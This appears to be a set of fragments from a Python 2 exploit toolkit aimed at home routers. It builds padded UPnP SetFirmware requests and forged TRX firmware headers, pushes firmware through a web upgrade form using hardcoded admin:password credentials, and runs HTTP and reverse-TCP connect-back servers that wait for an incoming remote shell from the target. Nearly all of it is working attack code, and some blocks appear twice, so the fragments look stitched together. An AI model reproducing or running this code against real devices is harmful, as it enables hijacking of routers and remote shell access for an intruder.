def __init__(self, logger=None):
if not logger:
logger = Logging(max_level=Logging.DEBUG)
self.request_body = "A" * self.MIN_CONTENT_LENGTH
length = len(self.request_body)
logger.LOG_DEBUG("Length of request body is: %d" % length)
self.request_headers = SetFirmwareRequestHeaders(length)
def __init__(self,firmware_data,b64encode=True,logger=None):
if not logger:
logger=Logging(max_level=Logging.DEBUG)
self.logger=logger
logger.LOG_DEBUG("Building SetFirmware request body.")
logger.LOG_DEBUG("Length of firmware: %d" % len(firmware_data))
if b64encode:
self.encoded_firmware=base64.b64encode(firmware_data)
else:
self.encoded_firmware=firmware_data
logger.LOG_DEBUG("Length of encoded firmware: %d" % len(self.encoded_firmware))
def __init__(self,firmware_file=None,logger=None):
b64encode=True
if not logger:
logger=Logging(max_level=Logging.DEBUG)
if firmware_file:
logger.LOG_INFO("Reading firmware data from: %s" % firmware_file)
firmware_data=open(firmware_file,"rb").read()
else:
b64encode=False
logger.LOG_INFO("Generating padding of As in place of firmware data.")
firmware_data="A"*self.MIN_CONTENT_LENGTH
self.request_body=SetFirmwareBody(firmware_data,b64encode=b64encode,logger=logger)
self.request_headers=SetFirmwareRequestHeaders(self.MIN_CONTENT_LENGTH)
def __init__(self,firmware_data,min_content_length=102401,logger=None):
if not logger:
logger=Logging(max_level=Logging.DEBUG)
self.request_body=SetFirmwareRequestBody(firmware_data,min_content_length,logger=logger)
length=len(self.request_body)
# logger.LOG_DEBUG("Length of request body is: %d" % length)
self.request_headers=SetFirmwareRequestHeaders(length)
def __init__(self,firmware_data,min_content_length,logger=None):
if not logger:
logger=Logging(max_level=Logging.DEBUG)
self.logger=logger
logger.LOG_DEBUG("Building SetFirmware request body.")
logger.LOG_DEBUG("Length of firmware: %d" % len(firmware_data))
self.encoded_firmware=base64.b64encode(firmware_data)
self.request_start="<SOAP-ENV:Body><NewFirmware>"
self.request_end="</NewFirmware></SOAP-ENV:Body>"
length=len(self.request_start)+len(self.request_end)+len(self.encoded_firmware)
padding=""
if length < min_content_length:
print "Current length is %d" % length
print "Generating %d As" %(min_content_length - length)
padding="A"*(min_content_length - length)+"FOO"
self.padding=padding
def __init__(self,host,port,fw_stage1,logger=None):
if not logger:
logger=Logging(max_level=Logging.DEBUG)
min_content_length=102401
self.logger=logger
self.host=host
self.port=port
request=SetFirmwareRequest(firmware_file=fw_stage1,logger=logger)
self.request=request
def __init__(self,host,port,fw_stage1,logger=None):
if not logger:
logger=Logging(max_level=Logging.DEBUG)
min_content_length=102401
self.logger=logger
self.host=host
self.port=port
firmware_data=open(fw_stage1,'rb').read()
request=SetFirmwareRequest(str(firmware_data),min_content_length,logger=logger)
self.request=request
def __init__(self, input_files, endianness, logger=None):
if not logger:
logger = Logging(max_level=Logging.DEBUG)
trx_header = TrxHeader(input_files, endianness, logger=logger)
firmware_data = str(trx_header)
for file in input_files:
firmware_data += open(file, "rb").read()
self.firmware_data = firmware_data
def main(firmware_file=None):
logger = Logging(max_level=Logging.DEBUG)
request = SetFirmwareRequest(firmware_file=firmware_file, logger=logger)
#write out the request to a file so we can easily analyze what we sent.
logger.LOG_DEBUG("Writing request to request.bin for analysis.")
open("./request.bin", "wb").write(str(request))
logger.LOG_DEBUG("Done.")
logger.LOG_INFO("Sending special UPnP request to host: %s" % HOST)
special_upnp_send(HOST, 5000, str(request))
logger.LOG_INFO("Done.")
def send_fw(url,fw_file):
logger=Logging(max_level=Logging.DEBUG)
logger.LOG_INFO("Sending %s" % fw_file)
logger.LOG_INFO("to %s" % url)
fw_file_basename=os.path.basename(fw_file)
logger.LOG_INFO("Creating headers.")
headers={"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"}
headers["Accept-Language"]="en-US,en;q=0.5"
headers["Accept-Encoding"]="gzip, deflate"
headers["Referer"]="http://192.168.127.141/UPG_upgrade.htm"
#admin:password
headers["Authorization"]="Basic YWRtaW46cGFzc3dvcmQ="
headers["Connection"]="keep-alive"
logger.LOG_INFO("Creating post data")
mf=MultipartForm()
mf.add_field("buttonHit","Upgrade")
mf.add_field("buttonValue","Upload")
mf.add_field("IS_check_upgrade","0")
mf.add_field("ver_check_enable","1")
mf.add_file("mtenFWUpload",fw_file)
mf.add_field("upfile",fw_file_basename)
mf.add_field("Upgrade","Upload")
mf.add_field("progress","")
post_data=str(mf)
headers["Content-Length"]=("%s" % len(post_data))
headers["Content-Type"]=mf.get_content_type()
client=HttpClient()
logger.LOG_INFO("Sending request.")
resp=client.send(url,headers=headers,post_data=post_data)
return resp
def main(stage1,stage2,docroot):
logger=Logging(max_level=Logging.DEBUG)
"""
Start servers
"""
try:
logger.LOG_INFO("Starting HTTP connect-back server.")
httpd,http_pid=do_http_connectback([stage2],HTTP_PORT,docroot,logger)
logger.LOG_INFO("HTTP server started.")
except Exception as e:
print e
sys.exit(1)
try:
logger.LOG_INFO("Starting reverse-tcp server.")
connect_back,cb_pid=do_tcp_connectback(CONNECTBACK_PORT,logger)
logger.LOG_INFO("Reverse-tcp server started.")
except Exception as e:
print e
httpd.shutdown()
sys.exit(1)
"""
Exploit UPnP
"""
try:
logger.LOG_DEBUG("Instantiating UPnP firmware exploit.")
exploit=UPNPFirmwareExploit(TARGET,UPNP_PORT,stage1,logger=logger)
logger.LOG_INFO("Sending stage 1 firmware.")
exploit.send()
logger.LOG_INFO("Done with stage 1 firmware.")
except Exception as e:
print e
traceback.print_exc()
httpd.shutdown()
connect_back.shutdown()
raise e
sys.exit(1)
"""
Wait for servers to finish.
"""
logger.LOG_INFO("Serving stage 2 firmware.")
try:
logger.LOG_INFO("Waiting for server to terminate. PID: %d" % http_pid)
httpd.wait()
except Exception as e:
logger.LOG_WARN("Error with HTTP server: %s" % str(e))
connect_back.shutdown()
httpd.shutdown()
#not sure if this is fatal or not.
#We probably killed with ctrl+c
sys.exit(1)
logger.LOG_INFO("HTTP server terminated.")
logger.LOG_INFO("Done serving with stage 2 firmware.")
logger.LOG_INFO("Waiting for incoming remote shell.")
try:
logger.LOG_INFO("Waiting for reverse-tcp server to terminate.")
connect_back.wait()
except Exception as e:
#pretty sure this happens when we ctrl+c during a reverse-tcp shell.
logger.LOG_INFO("Shutting down reverse-tcp server.")
connect_back.shutdown()
httpd.shutdown()
logger.LOG_INFO("Exploitation of %s complete." % TARGET)
httpd.shutdown()
connect_back.shutdown()
sys.exit(0)
logger.LOG_INFO("Done serving with stage 2 firmware.")
logger.LOG_INFO("Waiting for incoming remote shell.")
try:
logger.LOG_INFO("Waiting for reverse-tcp server to terminate.")
connect_back.wait()
except Exception as e:
#pretty sure this happens when we ctrl+c during a reverse-tcp shell.
logger.LOG_INFO("Shutting down reverse-tcp server.")
connect_back.shutdown()
httpd.shutdown()
logger.LOG_INFO("Exploitation of %s complete." % TARGET)
httpd.shutdown()
connect_back.shutdown()
sys.exit(0)
if __name__ == "__main__":
docroot=SRVROOT
stage1=docroot+"/"+STAGE1
try:
main(stage1,STAGE2,docroot)
except Exception as e:
Logging().LOG_WARN("Exploit failed: %s" % str(e))
def __init__(self, input_files, endianness, logger=None):
if not logger:
logger = Logging(max_level=Logging.DEBUG)
cls = self.__class__
self.endianness = endianness
if len(input_files) < 1 or len(input_files) > 3:
raise TrxHeaderException(
"Must have at least one input file and not more than 3.")
partitions = []
total_size = cls.TRX_HEADER_SIZE
offsets = [0, 0, 0]
i = 0
for file in input_files:
data = open(file, "rb").read()
offsets[i] = total_size
total_size += len(data)
partitions.append(data)
i += 1
sc = SectionCreator(self.endianness)
sc.string_section(cls.TRX_MAGIC_OFFSET,
cls.TRX_MAGIC,
description="TRX magic bytes.")
sc.gadget_section(cls.TRX_SIZE_OFFSET,
total_size,
description="Total size of trx+data.")
version_flags = self._make_version_flags(cls.TRX_FLAGS,
cls.TRX_VERSION)
sc.string_section(cls.TRX_FLAGS_OFFSET,
version_flags,
description="TRX flags & version.")
partition_offset = offsets[0]
sc.gadget_section(cls.TRX_PART_1_OFFSET,
partition_offset,
description="Offset of partition 1.")
partition_offset = offsets[1]
sc.gadget_section(cls.TRX_PART_2_OFFSET,
partition_offset,
description="Offset of partition 2.")
partition_offset = offsets[2]
sc.gadget_section(cls.TRX_PART_3_OFFSET,
partition_offset,
description="Offset of partition 3.")
pre_checksum_header = OverflowBuffer(self.endianness,
cls.TRX_HEADER_SIZE,
sc.section_list)
data = str(pre_checksum_header)
data = data[cls.TRX_FLAGS_OFFSET:]
data += "".join(partitions)
crc = CRC32(data).crc
logger.LOG_DEBUG("TRX crc32: 0x%08x" % crc)
sc.gadget_section(cls.TRX_CRC32_OFFSET,
crc,
description="crc32 of header+data.")
trx_header = OverflowBuffer(self.endianness, cls.TRX_HEADER_SIZE,
sc.section_list)
self.trx_header = str(trx_header)